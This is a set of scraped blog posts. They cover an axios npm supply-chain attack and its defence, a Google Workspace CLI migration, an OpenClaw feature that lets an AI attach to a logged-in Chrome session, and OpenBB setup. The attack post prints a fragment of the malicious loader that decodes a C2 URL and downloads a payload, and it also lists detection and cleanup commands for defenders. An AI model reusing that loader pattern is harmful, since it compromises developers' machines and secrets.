[{"content":"🚨 2025 Axios npm Supply Chain Attack: 40 Million Developers at Risk from RAT Backdoor | Attack Chain Analysis \u0026amp; Defense Guide \u0026ldquo;In the world of the internet, the most dangerous attacks don\u0026rsquo;t come from outside—they come from allies you trust.\u0026rdquo;\n— March 31, 2025, an ordinary Monday when the JavaScript ecosystem faced one of its most severe supply chain attacks in recent years\n📰 Executive Summary Item Details Date March 31, 2025 (Beijing Time) Affected Packages axios@1.14.1, axios@0.30.4 Attack Type Supply Chain Poisoning + Remote Access Trojan (RAT) Attack Vector Compromised maintainer account (jasonsaayman) Malicious Dependency plain-crypto-js@4.2.1 C2 Server http://sfrclak[.]com:8000 🎯 Chapter 1: How the Perfect Storm Formed 1.1 Why Axios? Imagine Axios as the \u0026ldquo;delivery guy\u0026rdquo; of the JavaScript world—with over 40 million weekly downloads, supporting data transmission from personal blogs to enterprise-grade applications. It\u0026rsquo;s one of the most popular HTTP client libraries on GitHub with over 100k+ stars.\nBut it\u0026rsquo;s precisely this ubiquitous popularity that made it the attackers\u0026rsquo; \u0026ldquo;dream target.\u0026rdquo;\n1.2 The Attacker\u0026rsquo;s Calculated Plan This wasn\u0026rsquo;t a crude hack—it was a carefully orchestrated \u0026ldquo;Trojan horse\u0026rdquo; operation:\nStep 1: Identity Theft\nAttackers successfully compromised the npm account of Axios core maintainer Jason Saayman This wasn\u0026rsquo;t a technical vulnerability—it was a \u0026ldquo;human\u0026rdquo; vulnerability, likely phishing emails, password reuse, or social engineering Step 2: Version Trap\nPublished two seemingly normal versions: 1.14.1 and 0.30.4 Version numbers followed semver conventions, raising no developer alarms Step 3: Hidden Dependency Injection\nInjected plain-crypto-js@4.2.1 as a dependency in package.json The name was highly deceptive—masquerading as the popular crypto-js library Step 4: Hook Trigger\nLeveraged npm\u0026rsquo;s postinstall hook to automatically execute malicious code during installation This is why you could be compromised even without actively calling axios 🔬 Chapter 2: Technical Deep Dive—How the Malicious Code Works 2.1 The Layered setup.js Obfuscation The setup.js file in the malicious package was a \u0026ldquo;masterpiece of obfuscation art\u0026rdquo;:\n// Seemingly harmless on the surface... // Actually multi-layer Base64 encoded and string obfuscated function _0xabc123() { // Decode hidden C2 server address const server = atob(\u0026#34;aHR0cDovL3NmcmNsYWsuY29tOjgwMDA=\u0026#34;); // Download platform-specific malicious payload downloadPayload(server + \u0026#34;/6202033\u0026#34;); } 2.2 Cross-Platform Attack Chain The attackers demonstrated surprising \u0026ldquo;full-stack capabilities\u0026rdquo;:\nPlatform Attack Method Payload Location Linux curl/wget download → chmod +x → execute /tmp/ld.py macOS Same as above, or launchd persistence ~/Library/.hidden/ Windows PowerShell download → in-memory execution %TEMP%\\setup.js 2.3 Self-Destruction Mechanism—Crime Scene Cleanup The most insidious part: the malicious script self-deletes after execution, leaving only a running RAT backdoor. This means:\nSecurity scans might not detect the problem Log analysis requires tracing back to installation time Forensic difficulty significantly increased 💥 Chapter 3: Impact Assessment \u0026amp; Risk Evaluation 3.1 Who Was Affected? Direct Victims:\nDevelopers who updated axios on March 31, 2025 Projects using ^1.14.0 or ~0.30.0 version ranges CI/CD pipelines with automatic dependency installation Risk Level: 🔴 Critical\nReasons:\nPrivilege Escalation: RAT typically runs with user privileges, enabling lateral movement Data Exfiltration: Access to source code, environment variables, and secret keys Persistent Threat: Backdoors may remain even after axios is patched 3.2 The \u0026ldquo;Trust Crisis\u0026rdquo; of Supply Chains This incident exposed a harsh reality:\nWhen you npm install axios, you\u0026rsquo;re not just trusting axios\u0026rsquo;s code—you\u0026rsquo;re trusting:\nnpm platform security Maintainer account security All indirect dependency maintainers This is the terrifying aspect of supply chain attacks—when any link in the trust chain breaks, the entire system collapses.\n🛡️ Chapter 4: Response \u0026amp; Self-Rescue Guide 4.1 Emergency Checklist Execute immediately (within 5 minutes):\n# 1. Check if malicious versions are installed npm list axios 2\u0026gt;/dev/null | grep -E \u0026#34;1\\.14\\.1|0\\.30\\.4\u0026#34; # 2. Check for suspicious modules ls node_modules/plain-crypto-js 2\u0026gt;/dev/null \u0026amp;\u0026amp; echo \u0026#34;⚠️ Malicious package found!\u0026#34; # 3. Check if system is compromised (Linux/Mac) ls -la /tmp/ld.py 2\u0026gt;/dev/null \u0026amp;\u0026amp; echo \u0026#34;🚨 System compromised!\u0026#34; # 4. Check for suspicious network connections netstat -an | grep -E \u0026#34;54\\.243\\.123\\.|sfrclak\u0026#34; 4.2 If You\u0026rsquo;ve Been Compromised Step 1: Isolation\nImmediately disconnect from network Pause CI/CD pipelines Notify team members Step 2: Cleanup\n# Delete node_modules and reinstall (using safe version) rm -rf node_modules package-lock.json npm install axios@1.14.0 # Rollback to safe version # Check and remove persistent backdoors # Linux: rm -f /tmp/ld.py /tmp/.hidden/* # macOS: rm -rf ~/Library/LaunchAgents/com.*.plist # Windows: # Use antivirus full system scan Step 3: Key Rotation\nAssume all environment variables are leaked Rotate API Keys, database passwords, SSH keys Check Git commit history for anomalies 4.3 Long-term Hardening Strategies 1. Lock Dependency Versions\n{ \u0026#34;dependencies\u0026#34;: { \u0026#34;axios\u0026#34;: \u0026#34;1.14.0\u0026#34; // Remove ^ and ~ } } 2. Use Private Registries\nConfigure npm to use private registry (e.g., Nexus, Artifactory) Set up package review processes 3. Enable Dependency Scanning\n# Use npm audit npm audit # Use Snyk npx snyk test # Use GitHub Dependabot # Enable in repository settings 4. Runtime Monitoring\nUse tools like Falco, OSSEC to monitor anomalous processes Set up file integrity checking (AIDE, Tripwire) 🤔 Chapter 5: What Can We Learn? 5.1 Open Source Software\u0026rsquo;s \u0026ldquo;Achilles\u0026rsquo; Heel\u0026rdquo; Open source software\u0026rsquo;s freedom and risk are two sides of the same coin:\nAdvantages: Code transparency, community review, rapid iteration Disadvantages: Maintainer burnout, single points of failure, resource scarcity 5.2 Advice for Developers Never blindly trust \u0026ldquo;latest\u0026rdquo;\nPin version numbers, review changelogs Use package-lock.json or yarn.lock Layered Security Strategy\nDevelopment environment ≠ Production environment Use hardware keys (YubiKey) for sensitive operations Regular credential rotation Build Emergency Response Capability\nDevelop supply chain attack response playbooks Conduct regular security drills Establish rapid rollback mechanisms 5.3 Advice for Platform Providers npm and similar platforms need:\nMandatory MFA (Multi-Factor Authentication) Signature verification mechanisms Delayed publishing (time for security review) Better audit logging 📚 References Axios GitHub Issue #10604 StepSecurity Technical Analysis Snyk Security Advisory SANS ISC Analysis Tencent Cloud Security Notice 📝 Final Thoughts The Axios incident wasn\u0026rsquo;t the first supply chain attack, and it won\u0026rsquo;t be the last. From 2018\u0026rsquo;s event-stream to 2021\u0026rsquo;s codecov, to today\u0026rsquo;s axios, we see a troubling trend: attackers are shifting focus from \u0026ldquo;breaking systems\u0026rdquo; to \u0026ldquo;breaking trust.\u0026rdquo;\nIn this complex network woven from dependencies, every developer is both a beneficiary and a potential victim. Stay vigilant, follow best practices, build defense in depth—these clichéd recommendations may be the key to saving your project in times of crisis.\nSecurity is a marathon without a finish line, not a sprint.\nReport generated: April 1, 2025\nAuthor: AI Agent Duran\nStatus: Compiled from public information, for reference only\n","permalink":"https://www.d5n.xyz/en/posts/2025-04-01-axios-supply-chain-attack/","summary":"\u003ch1 id=\"-2025-axios-npm-supply-chain-attack-40-million-developers-at-risk-from-rat-backdoor--attack-chain-analysis--defense-guide\"\u003e🚨 2025 Axios npm Supply Chain Attack: 40 Million Developers at Risk from RAT Backdoor | Attack Chain Analysis \u0026amp; Defense Guide\u003c/h1\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003e\u0026ldquo;In the world of the internet, the most dangerous attacks don\u0026rsquo;t come from outside—they come from allies you trust.\u0026rdquo;\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e— March 31, 2025, an ordinary Monday when the JavaScript ecosystem faced one of its most severe supply chain attacks in recent years\u003c/p\u003e\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch2 id=\"-executive-summary\"\u003e📰 Executive Summary\u003c/h2\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eItem\u003c/th\u003e\n \u003cth\u003eDetails\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDate\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eMarch 31, 2025 (Beijing Time)\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eAffected Packages\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"mailto:axios@1.14.1\"\u003eaxios@1.14.1\u003c/a\u003e, \u003ca href=\"mailto:axios@0.30.4\"\u003eaxios@0.30.4\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eAttack Type\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eSupply Chain Poisoning + Remote Access Trojan (RAT)\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eAttack Vector\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eCompromised maintainer account (jasonsaayman)\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eMalicious Dependency\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"mailto:plain-crypto-js@4.2.1\"\u003eplain-crypto-js@4.2.1\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eC2 Server\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003ehttp://sfrclak[.]com:8000\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"-chapter-1-how-the-perfect-storm-formed\"\u003e🎯 Chapter 1: How the Perfect Storm Formed\u003c/h2\u003e\n\u003ch3 id=\"11-why-axios\"\u003e1.1 Why Axios?\u003c/h3\u003e\n\u003cp\u003eImagine Axios as the \u0026ldquo;delivery guy\u0026rdquo; of the JavaScript world—with over \u003cstrong\u003e40 million weekly downloads\u003c/strong\u003e, supporting data transmission from personal blogs to enterprise-grade applications. It\u0026rsquo;s one of the most popular HTTP client libraries on GitHub with over \u003cstrong\u003e100k+ stars\u003c/strong\u003e.\u003c/p\u003e","title":"2025 Axios npm Supply Chain Attack: 40 Million Developers at Risk from RAT Backdoor | Attack Chain Analysis \u0026 Defense Guide"},{"content":"Introduction: An AI Agent Power User\u0026rsquo;s Tool Evolution As a heavy user of OpenClaw AI assistant, my daily workflow has long been inseparable from automation:\nEvery morning at 8:17, AI automatically pushes today\u0026rsquo;s schedule and todo tasks Stock analysis automatically fetches data and generates technical reports Blog publishing with bilingual Chinese/English auto-deployment Memory management automatically backs up to GitHub Behind these automations lies deep integration with Google services: Google Calendar for scheduling, Google Tasks for tracking todos, and Google Drive for file storage.\nI previously wrote two articles sharing my approach:\n\u0026ldquo;AI Assistant Schedule Management in Practice: OpenClaw + Google Calendar/Tasks Automation\u0026rdquo; - Using Python scripts to connect Google services \u0026ldquo;Rclone Mount Google Drive: File Management for AI Assistants\u0026rdquo; - Using rclone to manage Drive files But recently I encountered several pain points that prompted me to rethink the entire approach\u0026hellip;\nPart 1: Problems with the Previous Approach 1.1 Issues with Python Scripts In \u0026ldquo;AI Assistant Schedule Management in Practice,\u0026rdquo; I used Python scripts with OAuth to access Google Calendar and Tasks:\n# Previous approach from google.oauth2.credentials import Credentials creds = Credentials.from_authorized_user_file(\u0026#39;token.json\u0026#39;) service = build(\u0026#39;tasks\u0026#39;, \u0026#39;v1\u0026#39;, credentials=creds) But tokens kept expiring:\ninvalid_grant: Token has been expired or revoked Had to re-authorize every few days Resulted in daily briefs showing \u0026ldquo;failed to fetch\u0026rdquo; for task lists High maintenance costs:\nManual token refresh required Scripts scattered, single-purpose Different services needed different scripts 1.2 Issues with Rclone In \u0026ldquo;Rclone Mount Google Drive,\u0026rdquo; I used rclone to manage files:\nrclone mount gdrive: ~/GoogleDrive But difficult for AI Agent invocation:\nRclone mounts as local file system OpenClaw needs complex command chaining to operate Drive files Upload/download requires local file intermediates Scattered configuration:\nOne config for rclone Another config for Python scripts Management chaos 1.3 My New Requirements As an AI Agent user rather than a developer, I wanted:\n✅ Unified management - One tool for all Google services\n✅ Automatic token management - No manual refresh\n✅ AI-friendly - OpenClaw can call directly\n✅ Chinese support - Email subjects without garbled text\nUntil I discovered Google\u0026rsquo;s official gws (Google Workspace CLI)\nPart 2: What is Google Workspace CLI? gws is Google\u0026rsquo;s official command-line tool. Simply put:\nJust like kubectl manages Kubernetes or aws manages AWS, gws lets you manage all Google services with one-line commands.\n2.1 Supported Services Service What I Can Do Replaces Previous Google Tasks Create/complete tasks Python scripts Google Calendar View/create schedules Python scripts Gmail Send/receive emails Didn\u0026rsquo;t have before Google Drive Upload/download/manage files Rclone Google Sheets Read/write spreadsheets Didn\u0026rsquo;t have before Google Docs Edit documents Didn\u0026rsquo;t have before 2.2 Value for AI Agent Users Previous workflow:\nOpenClaw → Python scripts → Google API → Calendar/Tasks ↓ Rclone → Google Drive Current workflow:\nOpenClaw → gws → All Google services Unified, clean, officially supported\nPart 3: Migration in Practice 3.1 Installing gws npm install -g @googleworkspace/cli 3.2 Authentication (One-time Setup) Previous pain point: Python script OAuth tokens expired every few days.\ngws solution:\nCreate Google Cloud project (one-time) Enable required APIs (Drive, Gmail, Calendar, Tasks) OAuth authorization, get refresh_token refresh_token valid for 7 days, auto-renews After setup, OpenClaw can call directly:\nexport GOOGLE_WORKSPACE_CLI_TOKEN=\u0026#34;ya29.xxx\u0026#34; # View tasks gws tasks tasks list # Send email gws gmail users.messages send ... 3.3 Replacing Previous Python Scripts Previous task fetching script (often failed):\n# Old code, token frequently expired from google_tasks_oauth import get_tasks_service service = get_tasks_service() # Often errors Now with gws:\n# One command, stable and reliable gws tasks tasks list --format table Comparison:\nDimension Previous Python Scripts Current gws Token management Manual refresh, frequent expiration refresh_token auto-renews Feature scope Single (only Tasks) Comprehensive (all Google services) Stability ⭐⭐⭐ ⭐⭐⭐⭐⭐ Ease of use ⭐⭐⭐⭐ ⭐⭐ 3.4 Replacing Rclone Previously used rclone for Drive:\n# Mount to local rclone mount gdrive: ~/GoogleDrive # Then operate local files Now with gws:\n# Direct Drive operations, no mount needed gws drive files list gws drive files create --upload ./file.txt Comparison:\nDimension Previous Rclone Current gws File access Mounted as local filesystem Direct API operations AI invocation Complex (needs local paths) Simple (direct commands) Batch operations ✅ Efficient ⚠️ One-by-one Use case Large file transfers Daily file management Conclusion: Keep rclone for large file batch transfers, use gws for daily file management\nPart 4: OpenClaw Integration Examples 4.1 Daily Brief Integration Previous task fetching often failed (token expiration), now using gws:\n# In rss_news.py, modified def get_google_tasks(): \u0026#34;\u0026#34;\u0026#34;Use gws to fetch tasks (replaces previous OAuth script)\u0026#34;\u0026#34;\u0026#34; import subprocess result = subprocess.run( [\u0026#39;gws\u0026#39;, \u0026#39;tasks\u0026#39;, \u0026#39;tasks\u0026#39;, \u0026#39;list\u0026#39;, \u0026#39;--params\u0026#39;, \u0026#39;{\u0026#34;tasklist\u0026#34;: \u0026#34;@default\u0026#34;}\u0026#39;, \u0026#39;--format\u0026#39;, \u0026#39;json\u0026#39;], capture_output=True, text=True, env={\u0026#39;GOOGLE_WORKSPACE_CLI_TOKEN\u0026#39;: \u0026#39;ya29.xxx\u0026#39;} ) # Parse JSON return task list import json data = json.loads(result.stdout) return data.get(\u0026#39;items\u0026#39;, []) Result: Token valid for 7 days with auto-refresh support, no more frequent failures.\n4.2 Sending Emails (New Capability) Previous situation:\nMy automation workflow lacked email notification capability Had to manually open Gmail web interface to send emails Now with gws:\n# Send email (note Chinese encoding) ~/.openclaw/workspace/send-email.sh \\ bauhaushuang@hotmail.com \\ \u0026#39;Test Email\u0026#39; \\ \u0026#39;This is the email content\u0026#39; Gotcha: Chinese subjects sent directly will be garbled, requires MIME encoding.\nSolution: Wrapper script automatically handles UTF-8 Base64 encoding:\n# Correct MIME encoding Subject: =?UTF-8?B?5rWL6K+V6YKu5Lu2?= # Base64 encoded \u0026#34;测试邮件\u0026#34; Result: Now OpenClaw can directly invoke email sending, e.g., automatic email notification after daily report completion.\n4.3 File Management Previously used rclone requiring mount, now direct operations:\n# Upload to Drive gws drive files create \\ --upload ./document.md \\ --params \u0026#39;{\u0026#34;parents\u0026#34;: [\u0026#34;FOLDER_ID\u0026#34;]}\u0026#39; # Download file gws drive files get \\ --params \u0026#39;{\u0026#34;fileId\u0026#34;: \u0026#34;FILE_ID\u0026#34;}\u0026#39; \\ --output ./downloaded.md OpenClaw can directly invoke these commands.\nPart 5: Complete Old vs New Comparison 5.1 Architecture Comparison Component Previous Approach Current Approach Google Tasks Python OAuth scripts gws Google Calendar Python OAuth scripts gws Gmail ❌ Didn\u0026rsquo;t have gws Google Drive Rclone gws + rclone (kept) Google Sheets ❌ Didn\u0026rsquo;t have gws Token management Scattered, prone to expiration Unified, auto-renews Configuration maintenance Multiple configs Single config 5.2 Usage Experience Comparison Scenario Before Now Evaluation Daily brief Token frequently expired Token stable 7 days ✅ Significant improvement Sending emails ❌ Didn\u0026rsquo;t have this feature Supports Chinese ✅ New capability File upload Rclone mount Direct commands ✅ More convenient Large file transfers Rclone efficient gws one-by-one ⚠️ Keep rclone Configuration complexity Medium Higher (initial setup) ⚠️ Learning curve 5.3 Maintenance Cost Comparison Item Before Now Scripts to maintain 3-4 1 (gws wrapper) Token refresh frequency Every 2-3 days Every 7 days Official support ❌ Community solution ✅ Google official API update sync Manual updates Automatic sync Part 6: My Recommendations 6.1 When to Migrate to gws ✅ You\u0026rsquo;re a heavy AI Agent user like me\nNeed OpenClaw/Claude to directly call Google services Want unified management interface ✅ Need unified management\nDon\u0026rsquo;t want to maintain multiple scripts Want Drive + Gmail + Calendar + Tasks in one place ✅ Pursuing stability\nTired of frequent token expirations Want official long-term support 6.2 When to Keep Previous Approach ⚠️ Only need single functionality\nJust need to read Calendar, Python script is simpler ⚠️ Large file batch transfers\nRclone is more efficient for batch transfers, keep as supplement ⚠️ Don\u0026rsquo;t want to tinker with configuration\ngws initial setup is complex, not worth it for short-term use 6.3 My Final Architecture OpenClaw AI Assistant ├── Schedule/Task Management → gws (replaces Python scripts) ├── Email Sending → gws (new capability) ├── Daily File Operations → gws (replaces most rclone scenarios) └── Large File Batch Transfers → Rclone (kept) Not complete replacement, but complementary\nPart 7: Summary From Python OAuth scripts + rclone to Google Workspace CLI, my tool stack has evolved:\nProblems Solved:\n✅ Frequent token expiration → refresh_token 7-day validity ✅ Scattered functionality → Unified management ✅ Missing email capability → Full Gmail support ✅ Garbled Chinese text → Correct MIME encoding Costs Paid:\n⚠️ Higher initial configuration complexity ⚠️ Need to learn new command formats ⚠️ Large file operations less efficient than rclone Final Evaluation:\nAs an AI Agent user rather than a developer, gws makes my automation workflow more unified, stable, and scalable. Although the configuration threshold is higher, it\u0026rsquo;s one-time setup and worth the time investment.\nIf you\u0026rsquo;re also using OpenClaw or other AI Agent frameworks and deeply depend on Google services, highly recommend trying gws.\nReferences My previous article: AI Assistant Schedule Management in Practice My previous article: Rclone Mount Google Drive Google Workspace CLI GitHub: https://github.com/googleworkspace/cli The author is a user of OpenClaw AI assistant, not a Google developer. This article shares real migration experience from a user perspective.\n","permalink":"https://www.d5n.xyz/en/posts/google-workspace-cli-guide/","summary":"\u003ch2 id=\"introduction-an-ai-agent-power-users-tool-evolution\"\u003eIntroduction: An AI Agent Power User\u0026rsquo;s Tool Evolution\u003c/h2\u003e\n\u003cp\u003eAs a heavy user of OpenClaw AI assistant, my daily workflow has long been inseparable from automation:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEvery morning at 8:17\u003c/strong\u003e, AI automatically pushes today\u0026rsquo;s schedule and todo tasks\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStock analysis\u003c/strong\u003e automatically fetches data and generates technical reports\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBlog publishing\u003c/strong\u003e with bilingual Chinese/English auto-deployment\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMemory management\u003c/strong\u003e automatically backs up to GitHub\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBehind these automations lies deep integration with Google services: \u003cstrong\u003eGoogle Calendar\u003c/strong\u003e for scheduling, \u003cstrong\u003eGoogle Tasks\u003c/strong\u003e for tracking todos, and \u003cstrong\u003eGoogle Drive\u003c/strong\u003e for file storage.\u003c/p\u003e","title":"From Scripts to Official: My Google Services Management Evolution - An OpenClaw User's CLI Migration Journey"},{"content":"Introduction On March 13, 2026, OpenClaw released a game-changing feature update — Live Chrome Session Attach. This functionality leverages Chrome DevTools Protocol (CDP) and Model Context Protocol (MCP) to enable AI assistants to seamlessly take control of your actual Chrome browser session.\nWhat is Live Chrome Session Attach? In one sentence: \u0026ldquo;One-click takeover of your real Chrome browser session — preserving login states, no extension required.\u0026rdquo;\nTraditional browser automation forces you to choose between:\nHeadless mode: Requires re-authentication on all sites, cannot use existing cookies Extension mode: Requires installing Chrome extensions, manual per-tab attachment Live Chrome Session Attach breaks through these limitations using the official Chrome DevTools MCP server.\nThree Browser Control Modes Compared Mode Use Case Login State Requirements Technology Built-in Chrome (default) Simple automation ❌ Re-authentication needed Built-in, no install Playwright Extension Relay (legacy) Automation with login ✅ Preserved Chrome extension required CDP Relay Live Session Attach ⭐(new) Real browser takeover ✅ Full session preserved No extension Chrome DevTools MCP Chrome DevTools MCP Overview Chrome DevTools MCP is Google\u0026rsquo;s official Model Context Protocol server that allows AI assistants to interact with Chrome browsers through a standardized MCP interface.\nKey Features:\nBased on Chrome DevTools Protocol (CDP) Supports remote debugging of active browser sessions Requires user to explicitly enable chrome://inspect/#remote-debugging Fully preserves user login states and session cookies Configuration Steps Step 1: Enable Chrome Remote Debugging Before using Live Session Attach, you must enable remote debugging in Chrome:\nOpen Chrome Settings Page\nchrome://inspect/#remote-debugging Enable Remote Debugging\nFind the \u0026ldquo;Remote Debugging\u0026rdquo; option Toggle the switch to enable Chrome will start a local debugging server (default port 9222) Verify Debugging Port\n# Visit in browser to see debuggable pages list http://localhost:9222/json Security Note: Remote Debugging listens on localhost (127.0.0.1) by default and won\u0026rsquo;t expose to external networks. OpenClaw communicates locally with this service.\nStep 2: OpenClaw Configuration Configure browser profiles in openclaw.json:\n{ \u0026#34;browser\u0026#34;: { \u0026#34;profiles\u0026#34;: { \u0026#34;user\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;existing-session\u0026#34;, \u0026#34;cdpUrl\u0026#34;: \u0026#34;http://127.0.0.1:9222\u0026#34; }, \u0026#34;openclaw\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;managed\u0026#34; } }, \u0026#34;defaultProfile\u0026#34;: \u0026#34;user\u0026#34; } } Configuration Details:\n\u0026quot;type\u0026quot;: \u0026quot;existing-session\u0026quot; - Use existing Chrome session \u0026quot;cdpUrl\u0026quot;: \u0026quot;http://127.0.0.1:9222\u0026quot; - Chrome DevTools Protocol address \u0026quot;defaultProfile\u0026quot;: \u0026quot;user\u0026quot; - Default to user session mode Step 3: Command Line Usage # Check current browser connection status openclaw browser status # Connect to current Chrome session using user profile openclaw browser snapshot --profile user # Execute actions on specific tabs openclaw browser click \u0026#34;Login Button\u0026#34; --profile user openclaw browser type \u0026#34;input[name=\u0026#39;search\u0026#39;]\u0026#34; \u0026#34;OpenClaw\u0026#34; --profile user Real-World Use Cases Use Case 1: Automated Email Processing # Prerequisite: You\u0026#39;re logged into Gmail in Chrome # Visit chrome://inspect/#remote-debugging to ensure it\u0026#39;s enabled openclaw browser snapshot --profile user # View current page # AI can see your Gmail interface and perform actions \u0026#34;Mark all unread emails as read and archive them\u0026#34; Use Case 2: Data Scraping (Login Required) # Take over logged-in LinkedIn/Taobao/internal systems openclaw browser --profile user \u0026#34;Scrape my order list\u0026#34; \u0026#34;Export my contacts\u0026#34; Use Case 3: Cross-Platform Price Comparison # Search across multiple platforms simultaneously openclaw browser --profile user \u0026#34;Search for iPhone 16 prices on Taobao, JD, and PDD\u0026#34; Comparison with Legacy Methods Legacy Method (Extension Relay) Install extension → Click attach → Re-login → Start operation → Re-attach for new tabs New Method (Live Session Attach via MCP) # 1. Enable Chrome Remote Debugging (one-time setup) chrome://inspect/#remote-debugging → Enable # 2. Use directly openclaw browser --profile user Core Advantages:\n✅ Built on official Chrome DevTools MCP, more stable ✅ Takes over your currently open Chrome window ✅ Automatically preserves Gmail, GitHub, banking login states ✅ No Chrome extension installation required ✅ Automatic tab switching Security Security Measure Description Local Communication Chrome DevTools listens on 127.0.0.1 only, not exposed to network User Authorization Must explicitly enable chrome://inspect/#remote-debugging Token Authentication OpenClaw Gateway uses token authentication Session Isolation Won\u0026rsquo;t affect other Chrome user profiles Official Protocol Based on Google\u0026rsquo;s official Chrome DevTools Protocol Version Requirements OpenClaw: 2026.3.13+ Chrome: Latest stable (DevTools MCP support) Operating Systems: macOS / Linux / Windows FAQ Q: Why do I need to enable chrome://inspect/#remote-debugging? A: This is Chrome\u0026rsquo;s official security design. Remote Debugging is disabled by default and must be explicitly enabled by the user to prevent unauthorized browser control by malicious software.\nQ: Is my browser still secure after enabling Remote Debugging? A: Yes. Remote Debugging listens on localhost (127.0.0.1) by default. External networks cannot connect directly. It\u0026rsquo;s safe as long as you don\u0026rsquo;t manually expose this port on public networks.\nQ: Do I need to reconfigure after Chrome restarts? A: Yes. Remote Debugging settings reset after Chrome restarts. You need to revisit chrome://inspect/#remote-debugging to re-enable.\nQ: Can\u0026rsquo;t attach on macOS? A: Known issue (GitHub Issue #46090). Ensure:\nCompletely quit Chrome (Cmd+Q) Restart Chrome and enable Remote Debugging Restart OpenClaw Gateway Reference Links OpenClaw Official Docs - Browser Chrome DevTools MCP Official Blog Chrome DevTools Protocol Documentation OpenClaw GitHub Releases Model Context Protocol (MCP) Specification Written on March 15, 2026, based on OpenClaw 2026.3.13 and Chrome DevTools MCP official documentation\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-live-chrome-session-attach/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eOn March 13, 2026, OpenClaw released a game-changing feature update — \u003cstrong\u003eLive Chrome Session Attach\u003c/strong\u003e. This functionality leverages Chrome DevTools Protocol (CDP) and Model Context Protocol (MCP) to enable AI assistants to seamlessly take control of your actual Chrome browser session.\u003c/p\u003e\n\u003ch2 id=\"what-is-live-chrome-session-attach\"\u003eWhat is Live Chrome Session Attach?\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIn one sentence: \u0026ldquo;One-click takeover of your real Chrome browser session — preserving login states, no extension required.\u0026rdquo;\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eTraditional browser automation forces you to choose between:\u003c/p\u003e","title":"OpenClaw 2026.3.13: Live Chrome Session Attach Deep Dive"},{"content":"Why OpenBB? When using commercial financial data APIs (like TwelveData), you often encounter these issues:\nRate limits: Daily caps on API calls (e.g., 800/day) Limited data coverage: No support for crypto or macroeconomic data Cost concerns: Paid upgrades required for high-frequency usage Vendor lock-in: Data formats and API designs tied to specific providers OpenBB is an open-source financial data platform that provides a \u0026ldquo;connect once, consume everywhere\u0026rdquo; solution.\nCore Advantages of OpenBB Feature OpenBB Commercial API (TwelveData) Cost Free \u0026amp; Open Source Limited free tier Data Sources Multi-source aggregation (yfinance, FRED, etc.) Single source Cryptocurrency ✅ Supported ❌ Not supported Macroeconomics ✅ Supported (OECD, FRED) ❌ Not supported Technical Indicators ✅ Built-in calculation Manual calculation Vendor Lock-in ❌ None ✅ Strong dependency Environment Setup This guide is based on the following environment:\nComponent Version/Details OpenClaw 2026.3.2 OS Debian 13 (Linux 6.12.63) Python 3.13+ Network Stable internet access required Installing OpenBB Step 1: Create Virtual Environment Debian systems need the python3-venv package:\n# Install venv module (requires sudo) sudo apt install python3.13-venv # Create virtual environment python3 -m venv ~/.openclaw/openbb-env Step 2: Install OpenBB # Activate virtual environment source ~/.openclaw/openbb-env/bin/activate # Upgrade pip pip install --upgrade pip # Install OpenBB with all extensions pip install \u0026#34;openbb[all]\u0026#34; Installation time: ~3-5 minutes (depends on network speed)\nVerification:\npython3 -c \u0026#34;from openbb import obb; print(\u0026#39;✅ OpenBB installed successfully\u0026#39;)\u0026#34; Configuring Data Sources No API Key Required (Out-of-the-box) Source Use Case Limitations yfinance Stocks, Crypto Free, rate limits apply OECD Macroeconomic data Delayed data IMF Global economic data Incomplete data World Bank Development data Delayed data API Key Required (Optional) Source Use Case Free Tier Registration FRED US macroeconomic data Free fred.stlouisfed.org Alpha Vantage Real-time stock data 25 calls/day alphavantage.co Finnhub Stocks, News 60 calls/minute finnhub.io Configure API Keys After obtaining API keys, edit the virtual environment activation script:\nvim ~/.openclaw/openbb-env/bin/activate Add at the end:\n# OpenBB API Keys export FRED_API_KEY=\u0026#34;your_fred_key_here\u0026#34; export AV_API_KEY=\u0026#34;your_alpha_vantage_key_here\u0026#34; Basic Usage Examples Fetch Stock Data #!/usr/bin/env python3 import sys sys.path.insert(0, \u0026#39;/path/to/your/openbb-env/lib/python3.13/site-packages\u0026#39;) from openbb import obb # Get Apple stock historical data output = obb.equity.price.historical(\u0026#39;AAPL\u0026#39;, provider=\u0026#39;yfinance\u0026#39;, limit=30) df = output.to_dataframe() # View latest data latest = df.iloc[-1] print(f\u0026#34;Current Price: ${latest[\u0026#39;close\u0026#39;]:.2f}\u0026#34;) 